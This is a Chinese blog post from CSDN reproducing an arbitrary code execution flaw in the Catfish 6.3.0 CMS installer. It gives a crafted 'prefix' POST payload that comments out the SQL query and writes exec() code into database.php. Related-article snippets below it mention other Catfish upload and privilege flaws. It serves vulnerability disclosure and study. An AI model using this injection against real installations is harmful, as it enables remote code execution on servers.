Catfish任意代码执行漏洞 0day

置顶 已于 2022-04-12 19:30:14 修改
阅读量726 收藏
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 0day 文章标签: php web安全 安全
于 2021-12-28 16:24:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/miuzzx/article/details/122125316
本文详细介绍了Catfish6.3.0版本中的一个严重安全漏洞,该漏洞允许攻击者通过构造特定的POST参数,实现任意代码执行。在安装过程中,通过修改请求参数,可以绕过SQL查询的错误检查,成功写入恶意代码到database.php文件中,从而在后续数据库操作中触发代码执行。修复此漏洞的关键在于正确过滤和验证用户输入,防止非法数据注入。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Catfish任意代码执行漏洞

漏洞影响

Catfish6.3.0

复现过程

漏洞位置:application\install\controller\Index.php step3()
在这里插入图片描述
在该函数中会将我们传入的内容替换database.php中的数据
我们来看下该文件
在这里插入图片描述
这么一看会发现很简单,是不是只要post 传入prefix=','a'=>exec('calc')]?>之类的的就可以成功写入里面呢,但是经过断点跟踪发下存在一些问题。
在这里插入图片描述
在此之前会进行一个查询,如果我们传prefix=','a'=>exec('calc')]?>,那么最终的查询语句就是select * from ','a'=>exec('calc')]?>posts where id=1很明显会sql语法错误,所以为了绕过这个地方需要加些东西,我们只要保证能查出数据即可。
所以我们可以传

prefix=information_schema.schemata%23','a'=>exec('calc')]?>

这样拼接的sql语句为select * from information_schema.schemata%23','a'=>exec('calc')]?>>posts where id=1
#后面的会被注释掉,所以最终执行的sql语句为select * from information_schema.schemata。成功达到查出数据的目的。
在安装的过程抓包修改post参数如下。

在这里插入图片描述
接着我们来看下本地的database.php文件
在这里插入图片描述
可以看到成功写入。
剩下的就简单了,因为是数据库配置文件,所以任何调用数据库的地方都会触发,比如首页。
在这里插入图片描述

shell实例手册
yonggeit的博客
05-27 6493
shell实例手册 1文件{ touch file # 创建空白文件 rm -rf 目录名 # 不提示删除非空目录(-r:递归删除 -f强制) dos2unix # windows文本转linux文本 unix2dos # linux文本转windows文本 enca filename ...
英语四级单词
xxiyy0411的博客
12-18 2万+
// ==UserScript== // @name 背单词 // @description 边上网边刷英语四级单词 // @namespace Xiaomaxin // @version 1.31 // @author Xiaomaxin // @include * // @require http://cdn.bootcss.com
代码审计--CatfishCMS文件上传漏洞
Nginxx的博客
12-07 625
声明:本公众号大部分文章来黑白之间安全团队成员的实战经验以及学习积累,文章内公布的漏洞或者脚本都来自互联网,未经授权,严禁转载。 请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本团队无关。 前言 逛 cnvd 的时候看到 catfish cms 的文件上传漏洞,于是审了审,就发现了这两处文件上传,具体是不是该漏洞,还有待考证。 CNVD编号 CNVD-2021-42363 影响范围 文中标的是 Catfish CMS V5.9.6 ,但这里这个我看了下,最新能下载到的 v5.9.
Catfish CMS漏洞集合
weixin_30455661的博客
04-08 1573
转自https://larryxi.github.io/ 0x00 背景 版本:V 4.2.35 官网下载:http://www.catfish-cms.com/page/4.html 文章内容仅作学习参考,勿以恶小而为 0x01 任意文件删除 拿到一个cms进行安装后,首先比较喜欢看看其安装逻辑,查找有没有在安装流程中直接导致重装的可能性。由于系统是THINKPHP5开发的,...
基于catfishcms(鲶鱼)靶场的垂直越权漏洞
最新发布
m0_74249600的博客
08-11 451
本文复现了catfish靶场的垂直越权漏洞,并补充了其逻辑上的可点之处
Catfishcms漏洞复现
小小猪的博客
12-21 1931
Catfishcms漏洞复现 环境搭建: Catfishcms v4.8.54环境搭建 漏洞复现: 代码审计: _method=__construct Request类(catfish/library/think/Request.php)用于处理请求,函数method用于获取请求的类型 application/config.php 中定义了“表单请求类型伪装变量”: POST请求参数 “ _method=__construct ”,将 __construct 传给了var_metho.
PHP代码审计』CatfishBlog3.9存在文件上传漏洞
Ho1aAs‘s Blog
06-13 523
文章目录前言一、漏洞演示二、漏洞分析三、利用四、修复五、总结完 前言 作者:Ho1aAs 博客:https://blog.csdn.net/xxy605 一、漏洞演示 进入后台,选择插件 新建一个php文件,写入一句话木马,压缩成zip,点击插件上传 访问http://URL/application/plugins/a.php,上传成功 二、漏洞分析 在上传界面抓个包,提供上传功能在/application/admin/controller/Index.php public function up
掌握这些正则表达式模式,优化你的源代码搜索!
[掌握这些正则表达式模式,优化你的源代码搜索!](https://community.sap.com/legacyfs/online/storage/blog_attachments/2013/02/re_185541.jpg) # 1. 正则表达式在源代码搜索中的重要性 在软件开发和维护的过程中...
渗透测试高级面试题
fzx_hsaj的博客
02-13 1万+
1 应用程序开发过程中,下面那些开发习惯可能导致安全漏洞?() A 在程序代码中打印日志输出敏感信息方便调式 B 在使用数组前判断是否越界 C 在生成随机数前使用当前时间设置随机数种子 D 设置配置文件权限为rw-rw-rw- 答案:AD 解释: A 为日志包含敏感信息,容易泄露账号密码接口数据等信息,可能产生安全漏洞。 B 为数组大小问题,数组不越界,可防止溢出安全漏洞。因此是安全的。 C 用...
Linux命令
热门推荐
weixin_44265425的博客
06-14 25万+
Linux 学习笔记 LINUX常用操作命令和命令行编辑快捷键 终端快捷键: Ctrl + a/Home 切换到命令行开始 Ctrl + e/End 切换到命令行末尾 Ctrl + l 清除屏幕内容,效果等同于 clear Ctrl + u 清除剪切光标之前的内容 Ctrl + k 剪切清除光标之后的内容 Ctrl + y 粘贴刚才所删除的字符 Ctrl + r 在历史命令中查找 (这个非常好用,输入关键字就调出以前的命令了) Ctrl + c 终止命令 ctrl + o 重复执行命令 Ctrl + d 退
Catfish(鲶鱼)cms-带有越权漏洞的源码.zip
03-16
Catfish(鲶鱼)cms-带有越权漏洞的源码,亲测真实有效可靠,如有侵权,请联系CSDN管理员删除即可
Catfish(鲶鱼)cms-带有越权漏洞的源码(1).zip
12-31
Catfish(鲶鱼)cms-带有越权漏洞的源码,亲测真实有效,可下载使用,如有侵权,请联系CSDN管理员删除
Catfish.java的源代码
12-08
Catfish.java 的源代码,写的详细正确,而且每一行代码有注释,便于读者理解。谢谢关注。
Catfish(鲶鱼) Blog源代码
03-18
Catfish(鲶鱼) Blog是一款开源的PHP Blog系统,其衍生于优秀的内容管理系统:Catfish(鲶鱼) CMS。 Catfish(鲶鱼) Blog系统秉承了Catfish(鲶鱼) CMS的先进设计理念,并且专注于个人博客系统。 Catfish(鲶鱼) Blog系统使用十分便捷,便捷到您只需直接开始博客写
catfish.java
11-27
一个有趣的小程序,catfish,可以用来练习Java,简单易懂
越权漏洞(基于catfishcms靶场的垂直越权、水平越权)
qq_61529962的博客
12-19 921
垂直越权 创建一个普通用户test、和管理员用户admin页面的url对比,未发现任何越权url 创建一个后台用户test1、和管理员用户admin页面的url对比 test1后台页面,只有内容管理 admin后台管理页面 在页面管理的新建页面的url和test1用户做比较,多了admin/index/newpage.html 在test1用户管理页面的url后加上admin/index/newpage.html
php post 漏洞_CatFish CMS V4.8.75最新版XSS漏洞审计
weixin_39827728的博客
11-08 384
作为一名没入门的新手的第一篇文章,大佬轻喷,大佬轻喷,大佬轻喷!如有不对,欢迎指正。这里用到的是最新版的CatFish CMS V4.8.75,是一款开源免费的个人博客及企业建站系统。首先在官网下载并安装安装完成后我们先来看首页,有三个可以做输入的地方:搜索、评论、留言。本着见框就插的原则我们先来看搜索框,我们在搜索框注入测试代码:我们将keyword的值修改为我们的测试代码后点击for...
越权漏洞-catfish(超详解)
qq_59020256的博客
01-24 768
那么我将普通用户的cookie改为管理员用户的cookie,把抓的普通用户的包进行放包管理员用户的密码会被更改吗?5.查管理员用户的cookie与普通用户的cookie。当我把2.html改为1.html时发现。但是我们这个管理员是不存在这篇文章的。4.在另一个浏览器里面登录管理员用户。那么我将命名格式换了之后再放包呢?抓了管理员用户修改密码的包发现。发现两者的cookie不相同。越权漏洞-catfish。发现这里为2.html。3.在修改密码里面抓包。1.注册一个普通用户。
Catfish(鲶鱼) Blog源码
09-01
Catfish(鲶鱼) Blog是一款开源的PHP Blog系统,其衍生于优秀的内容管理系统:Catfish(鲶鱼) CMS。 Catfish(鲶鱼) Blog系统秉承了Catfish(鲶鱼) CMS的先进设计理念,并且专注于个人博客系统。 Catfish(鲶鱼) Blog系统使用十分便捷,便捷到您只需直接开始博客写作就可以了。 全站自适应设计,适用于pc,手机等不同大小屏幕的终端显示,支持手机、微信等小屏幕访问。 您可以随时随地通过手机编写您的博文。 Catfish(鲶鱼) Blog系统特点: 简单方便 Catfish(鲶鱼) Blog安装十分方便,只需输入域名,然后再点两次鼠标,期间填入一些必要的安装信息就可以轻松完成整个安装过程。 使用十分便捷,安装后进后台,直接写博客内容就可以了,无需事先进行任何设置操作。 要进行网站设置也十分简单,几分钟就可以完成。 简洁明了 Catfish(鲶鱼) Blog系统秉承了Catfish(鲶鱼) CMS的设计风格,后台操作简洁明了,功能区块安排合理。 博主只要将主要精力放在写作上就可以了,无需对系统进行复杂配置,只需简单的几个设置就可以了。 开源 Catfish(鲶鱼) Blog系统是100%开源的PHP程序,这保证了系统的代码更健壮和更安全。 支持好 您可以免费下载并使用Catfish(鲶鱼) Blog系统,并且官方会不定期地升级系统,您也可以随时升级您的系统到最新版。 Catfish(鲶鱼) Blog系统特色: 免费 Catfish(鲶鱼) Blog是一款可以完全免费使用的博客系统。 专业化 Catfish(鲶鱼) Blog是一款专业化的博客系统,专注于博客系统本身的优化和不断发展。 版权信息自定义 您可以在系统管理后台方便地修改和定义网站前台页面的版权信息。 多语言支持 目前支持简体中文、繁体中文、俄语、德语、法语、韩语、日语、英语各种语言,并能够自动识别使用者的语言环境,无需手动变更。 简单而又不简单 作为一款专业化的博客系统,Catfish(鲶鱼) Blog是操作最简单的博客系统之一,同时也支持复杂应用以及个性化应用,例如多人编辑文章等。 去除一切繁杂操作 为了保证使用者能专注于网站的内容建设,系统设计从一开始就摒弃了所有繁琐的操作,简单实用是系统最大的特色之一。 系统安装基本要求: PHP >= 5.4.X (注意:PHP5.4dev版本和PHP6均不支持) PDO PHP Extension MBstring PHP Extension CURL PHP Extension 系统安装: 将解压后index.php所在目录的所有文件以及文件夹全部复制到您的WEB运行环境的根目录下。 复制完所有文件后,您可以打开浏览器,然后在浏览器的地址栏输入您站点的域名,系统将自动进入安装页面。例如:如果域名是127.0.0.1,那么只要在浏览器地址栏输入“127.0.0.1”就可以开始安装系统了。记住要换成您自己的域名哦! 如果有任何建议和提议可以到官方网站留言 Catfish(鲶鱼) Blog 更新日志: v2.0.24更新: 主题扩展; 插件增强; 系统优化。
发现Catfish cms源码越权漏洞,提供下载验证
2. **文件命名规则**:文件名称“Catfish(鲶鱼)cms-带有越权漏洞的源码(1)”表明了文件的具体内容(包含越权漏洞Catfish CMS源码)和序号(表明可能有多个文件包,这是其中之一)。 总结以上知识点,我们可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yu22x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值